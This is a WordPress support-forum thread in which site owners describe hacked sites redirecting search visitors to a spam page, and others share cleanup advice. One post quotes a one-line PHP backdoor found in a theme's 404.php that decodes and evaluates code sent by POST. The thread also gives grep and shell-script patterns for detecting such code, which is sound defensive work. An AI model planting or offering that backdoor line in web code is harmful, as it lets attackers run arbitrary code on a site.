Site linking to http://notfound.iownyour.org/ (7 posts)

  1. dmcrae17
    Posted 3 years ago #

    I am having issues with my site redirecting to http://notfound.iownyour.org/ which looks like a fake search engine, advertising online blackjack. I am experiencing the following specific issues:

    1) When clicking one of my site's links from Facebook on Firefox and Safari: redirects to the above spam website

    2) When clicking one of my site's links from Facebook on Google Chrome: redirects to my website with no issue

    3) When searching and clicking the link of my site "Craving Cognition" on Google using any browser, it redirects to above spam website.

    My site is: http://cravingcognition.com

    Help would be appreciated!

  2. esmi
    Forum Moderator
    Posted 3 years ago #

    A scan of your site is clean but this does sound like a hack. :-(

    I think you really need to start working your way through these resources:

    Anything less will probably result in the hacker walking straight back into your site again.

  3. manugallack
    Posted 3 years ago #

    I've got the same problem with my site:

    When searching and clicking the link of my site "montblanc34.com" on Google, the under-categories redirect to this website:


    If someone can help me... (in French would be better!!)

  4. bcworkz
    Posted 3 years ago #

    @manugallack, I am not observing the behavior you describe. You must confirm if it is your site that is redirecting or your browser that is redirecting. These selective redirects can be difficult to isolate.

    Or perhaps you fixed the problem? If not, and if it is indeed your site that is redirecting, follow the suggestions posted by esmi above. I am sorry, I am unaware of such resources in French.

  5. juanmatias
    Posted 3 years ago #


    Hi all.

    I had the same issue on my server (http://www.jackyiddo.com). When I accessed it directly from the address bar there was no problem, but if I found my site on Google and then clicked on my address, I was redirected to another site. This is what I found.

    This piece of code was inserted in a few files in the WordPress directory tree:

    [ Moderator note: Please do not post that malware code here. ]

    Now, if you decode this base64 encoded text you will have this:

    [ Redacted ]

    As you can see depending on a few parameters the site is redirected.

    You need to find the modified files and delete this command (this command could appear multiple times in a single file). I found this piece of code in these files:

    • wp-config.php
    • wp-settings.php
    • wp-content/plugins/contact-form-7/modules/acceptance.php
    • wp-content/plugins/contact-form-7/modules/quiz.php
    • wp-content/plugins/contact-form-7/modules/select.php
    • wp-content/plugins/contact-form-7/modules/special-mail-tags.php
    • wp-content/plugins/contact-form-7/modules/jetpack.php
    • wp-content/plugins/contact-form-7/modules/akismet.php
    • wp-content/plugins/contact-form-7/modules/captcha.php
    • wp-content/plugins/contact-form-7/modules/text.php
    • wp-content/plugins/contact-form-7/modules/textarea.php
    • wp-content/plugins/contact-form-7/modules/checkbox.php
    • wp-content/plugins/contact-form-7/modules/file.php
    • wp-content/plugins/contact-form-7/modules/submit.php
    • wp-content/plugins/contact-form-7/modules/response.php
    • wp-content/plugins/contact-form-7/modules/flamingo.php

    Plus in file wp-content/themes/picturethis/404.php I found this code:

    <?php if ($_POST["php"]){eval(base64_decode($_POST["php"]));exit;} ?>

    I don't know if it is malicious, but I deleted it just in case and my site is working ok.

    How to find this code through your dir tree?

    If you have access to server's command line you can run this command:

    find ./ -name \*php -type f -exec grep -l 'eval.base64_decode' {} +

    (It will find the code in PHP files)

    From here on you must delete the code as you prefer.

    I hope this is useful for you.
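
An added example, not part of juanmatias's post: `grep -l` names each infected file once, while the post notes the code can occur several times in a single file. This script reports every occurrence with its line number and separates request-driven evals (like the 404.php line) from embedded payloads; the function names and the sample tree are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the thread): list every eval(base64_decode ...) hit
# in PHP files under a directory, one "CLASS<TAB>file:line" record per hit.
#   REQUEST = decoded input comes from a request superglobal
#   STATIC  = an encoded payload embedded in the file itself

scan_tree() {   # $1 = directory to scan
    find "$1" -type f -name '*.php' -exec awk '
        {
            line = tolower($0)      # PHP function names are case-insensitive
            hits = 0
            # Count every occurrence; one line can hold several injected calls.
            while (match(line, /eval[ \t]*\([ \t]*base64_decode/)) {
                hits++
                line = substr(line, RSTART + RLENGTH)
            }
            if (hits == 0) next
            class = ($0 ~ /\$_(POST|GET|REQUEST|COOKIE)/) ? "REQUEST" : "STATIC"
            for (i = 0; i < hits; i++) printf "%s\t%s:%d\n", class, FILENAME, FNR
        }' {} +
}

count_class() { # $1 = directory, $2 = REQUEST or STATIC
    scan_tree "$1" | awk -F '\t' -v c="$2" '$1 == c { n++ } END { print n + 0 }'
}

make_sample_tree() {    # constructed sample files; prints the temp directory
    d=$(mktemp -d) || return 1
    mkdir -p "$d/plugins/demo"
    # Constructed payload: the base64 string decodes to "echo 1;".
    printf '%s\n' '<?php' 'eval(base64_decode("ZWNobyAxOw=="));' \
        'EVAL ( base64_decode("ZWNobyAxOw==")); eval(base64_decode("ZWNobyAxOw=="));' \
        > "$d/plugins/demo/text.php"
    # Same shape as the 404.php line quoted in the post above.
    printf '%s\n' '<?php if ($_POST["php"]){eval(base64_decode($_POST["php"]));exit;} ?>' \
        > "$d/404.php"
    printf '%s\n' '<?php echo base64_decode("ZWNobyAxOw=="); // no eval' > "$d/clean.php"
    printf '%s\n' "$d"
}

if [ $# -gt 0 ]; then
    scan_tree "$1"
else
    sample=$(make_sample_tree) && scan_tree "$sample" && rm -rf "$sample"
fi
```

Pass a directory as the first argument to scan it; with no argument the script scans the constructed sample tree.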

  6. methos10
    Posted 3 years ago #

    Hi dmcrae17!

    This is a JS-based malware. If you disable JavaScript in your browser it will work. You can test it.
    But that is not a solution!! The solution is to download the latest version of WordPress and override all of your files. Change your FTP and MySQL passwords.
    After the upgrade your site should work.

    I hope it was helpful!

  7. Andrew Nevins
    Forum moderator
    Posted 3 years ago #

    The solution isn't removing the malicious code. That will only resolve the symptom of the hack. The website will still remain hacked.

    Follow the links provided by Esmi to resolve a hack.

Topic Closed

This topic has been closed to new replies.
